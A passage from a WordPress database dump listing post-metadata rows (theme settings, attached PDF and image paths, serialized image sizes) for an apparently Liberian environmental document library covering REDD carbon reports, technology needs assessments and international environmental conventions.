header_template','0'),(24122,3534,'ocean_header_custom_menu','0'),(24123,3534,'ocean_menu_typo_font_family','0'),(24124,3534,'ocean_disable_title','default'),(24125,3534,'ocean_disable_heading','default'),(24126,3534,'ocean_disable_breadcrumbs','default'),(24127,3534,'ocean_display_footer_widgets','default'),(24128,3534,'ocean_display_footer_bottom','default'),(24129,3534,'ocean_custom_footer_template','0'),(24130,3534,'ocean_link_format_target','self'),(24131,3534,'ocean_quote_format_link','post'),(24132,3534,'osh_disable_topbar_sticky','default'),(24133,3534,'osh_disable_header_sticky','default'),(24134,3534,'osh_sticky_header_style','default'),(24148,3540,'_wp_attached_file','2021/03/Piloting-REDD-in-the-Wonegizi-Proposed-Protected-Area-Community-Benefits1.pdf'),(24152,3541,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/03/Wonegizi-REDDProject-Carbon-Baseline-Report.pdf'),(24153,3541,'by','Dr James R Smith & Dr Martin Kaonga'),(24154,3541,'year','2019'),(24160,3541,'_dp_original','3539'),(24161,3541,'_edit_lock','1670424961:42'),(24162,3541,'_last_editor_used_jetpack','classic-editor'),(24163,3541,'_edit_last','38'),(24164,3542,'_wp_attached_file','2021/03/Wonegizi-REDDProject-Carbon-Baseline-Report.pdf'),(24166,3541,'_pods_attached_document','a:1:{i:0;i:3542;}'),(24168,3541,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628878770;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3079;}i:1;a:1:{s:2:\"id\";i:3226;}i:2;a:1:{s:2:\"id\";i:3229;}}}}'),(24178,3545,'_wp_attached_file','2020/12/TNA1.png'),(24179,3545,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:16:\"2020/12/TNA1.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"TNA1-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"TNA1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24180,3287,'_pods_file_type_image','a:1:{i:0;i:3545;}'),(24186,3547,'_wp_attached_file','2021/03/Wonegizi-REDDProject-Carbon-Baseline-Report-1.pdf'),(24187,3548,'_wp_attached_file','2021/03/carbon.png'),(24188,3548,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:18:\"2021/03/carbon.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"carbon-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"carbon-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24189,3541,'_pods_file_type_image','a:1:{i:0;i:3548;}'),(24198,3549,'_wp_attached_file','2020/12/barrier.png'),(24199,3549,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:301;s:6:\"height\";i:427;s:4:\"file\";s:19:\"2020/12/barrier.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"barrier-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"barrier-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24200,3285,'_pods_file_type_image','a:1:{i:0;i:3549;}'),(24203,3550,'_wp_attached_file','2020/12/tnaagriculture.png'),(24204,3550,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:26:\"2020/12/tnaagriculture.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"tnaagriculture-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"tnaagriculture-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24205,3282,'_pods_file_type_image','a:1:{i:0;i:3550;}'),(24208,3551,'_wp_attached_file','2020/12/tnamitigation.png'),(24209,3551,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:25:\"2020/12/tnamitigation.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"tnamitigation-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"tnamitigation-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24210,3280,'_pods_file_type_image','a:1:{i:0;i:3551;}'),(24213,3552,'_wp_attached_file','2020/12/tnaclimatechange.png'),(24214,3552,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:28:\"2020/12/tnaclimatechange.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"tnaclimatechange-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"tnaclimatechange-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24215,3278,'_pods_file_type_image','a:1:{i:0;i:3552;}'),(24216,3278,'document_cover_image','3552'),(24217,3278,'attached_document','3279'),(24218,3229,'_last_editor_used_jetpack','classic-editor'),(24219,3553,'_wp_attached_file','2020/11/tnacommunitybenefits.png'),(24220,3553,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:32:\"2020/11/tnacommunitybenefits.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"tnacommunitybenefits-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"tnacommunitybenefits-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24221,3229,'_pods_file_type_image','a:1:{i:0;i:3553;}'),(24222,3229,'document_cover_image','3553'),(24223,3229,'attached_document','3230'),(24224,3240,'_last_editor_used_jetpack','classic-editor'),(24225,3554,'_wp_attached_file','2020/12/abs-protocol.png'),(24226,3554,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:24:\"2020/12/abs-protocol.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"abs-protocol-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"abs-protocol-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24227,3240,'_pods_file_type_image','a:1:{i:0;i:3554;}'),(24228,3240,'document_cover_image','3554'),(24229,3240,'attached_document','3242'),(24230,3243,'_last_editor_used_jetpack','classic-editor'),(24231,3555,'_wp_attached_file','2020/12/ace.png'),(24232,3555,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:15:\"2020/12/ace.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"ace-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ace-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24233,3243,'_pods_file_type_image','a:1:{i:0;i:3555;}'),(24234,3243,'document_cover_image','3555'),(24235,3243,'attached_document','3244'),(24236,3557,'_wp_attached_file','2020/12/cartagena.png'),(24237,3557,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:21:\"2020/12/cartagena.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"cartagena-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"cartagena-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24238,3245,'_pods_file_type_image','a:1:{i:0;i:3557;}'),(24239,3245,'document_cover_image','3557'),(24240,3245,'attached_document','3246'),(24241,3249,'_last_editor_used_jetpack','classic-editor'),(24242,3558,'_wp_attached_file','2020/12/unfccc.png'),(24243,3558,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:18:\"2020/12/unfccc.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"unfccc-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"unfccc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24244,3249,'_pods_file_type_image','a:1:{i:0;i:3558;}'),(24245,3249,'document_cover_image','3558'),(24246,3249,'attached_document','3250'),(24247,3251,'_last_editor_used_jetpack','classic-editor'),(24248,3559,'_wp_attached_file','2020/12/cites.png'),(24249,3559,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:17:\"2020/12/cites.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"cites-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"cites-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24250,3251,'_pods_file_type_image','a:1:{i:0;i:3559;}'),(24251,3251,'document_cover_image','3559'),(24252,3251,'attached_document','3252'),(24253,3253,'_last_editor_used_jetpack','classic-editor'),(24254,3560,'_wp_attached_file','2020/12/minamata.png'),(24255,3560,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:20:\"2020/12/minamata.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"minamata-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"minamata-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24256,3253,'_pods_file_type_image','a:1:{i:0;i:3560;}'),(24257,3253,'document_cover_image','3560'),(24258,3253,'attached_document','3256'),(24259,3257,'_last_editor_used_jetpack','classic-editor'),(24260,3561,'_wp_attached_file','2020/12/cbd.png'),(24261,3561,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:15:\"2020/12/cbd.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"cbd-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"cbd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24262,3257,'_pods_file_type_image','a:1:{i:0;i:3561;}'),(24265,3259,'_last_editor_used_jetpack','classic-editor'),(24266,3562,'_wp_attached_file','2020/12/cacc.png'),(24267,3562,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:16:\"2020/12/cacc.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"cacc-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"cacc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24268,3259,'_pods_file_type_image','a:1:{i:0;i:3562;}'),(24269,3259,'document_cover_image','3562'),(24270,3259,'attached_document','3260'),(24271,3261,'_last_editor_used_jetpack','classic-editor'),(24272,3563,'_wp_attached_file','2020/12/cms.png'),(24273,3563,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:15:\"2020/12/cms.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"cms-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"cms-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24274,3261,'_pods_file_type_image','a:1:{i:0;i:3563;}'),(24277,3263,'_last_editor_used_jetpack','classic-editor'),(24278,3564,'_wp_attached_file','2020/12/gcc.png'),(24279,3564,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:15:\"2020/12/gcc.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"gcc-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"gcc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24280,3263,'_pods_file_type_image','a:1:{i:0;i:3564;}'),(24281,3263,'document_cover_image','3564'),(24282,3263,'attached_document','3264'),(24283,3265,'_last_editor_used_jetpack','classic-editor'),(24284,3565,'_wp_attached_file','2020/12/ozone.png'),(24285,3565,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:17:\"2020/12/ozone.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ozone-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"ozone-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24286,3265,'_pods_file_type_image','a:1:{i:0;i:3565;}'),(24289,3267,'_last_editor_used_jetpack','classic-editor'),(24290,3567,'_wp_attached_file','2020/12/cbit.png'),(24291,3567,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:16:\"2020/12/cbit.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"cbit-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"cbit-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24292,3267,'_pods_file_type_image','a:1:{i:0;i:3567;}'),(24295,3269,'_last_editor_used_jetpack','classic-editor'),(24296,3568,'_wp_attached_file','2020/12/stockholm.png'),(24297,3568,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:21:\"2020/12/stockholm.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"stockholm-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"stockholm-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24298,3269,'_pods_file_type_image','a:1:{i:0;i:3568;}'),(24303,3271,'_last_editor_used_jetpack','classic-editor'),(24304,3569,'_wp_attached_file','2020/12/ramsar.png'),(24305,3569,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:18:\"2020/12/ramsar.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"ramsar-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"ramsar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24306,3271,'_pods_file_type_image','a:1:{i:0;i:3569;}'),(24309,3273,'_last_editor_used_jetpack','classic-editor'),(24310,3570,'_wp_attached_file','2020/12/tnaproject.png'),(24311,3570,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:297;s:6:\"height\";i:427;s:4:\"file\";s:22:\"2020/12/tnaproject.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"tnaproject-209x300.png\";s:5:\"width\";i:209;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"tnaproject-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24312,3273,'_pods_file_type_image','a:1:{i:0;i:3570;}'),(24315,3247,'_last_editor_used_jetpack','classic-editor'),(24316,3572,'_wp_attached_file','2020/12/baselconvention.png'),(24317,3572,'_wp_attachment_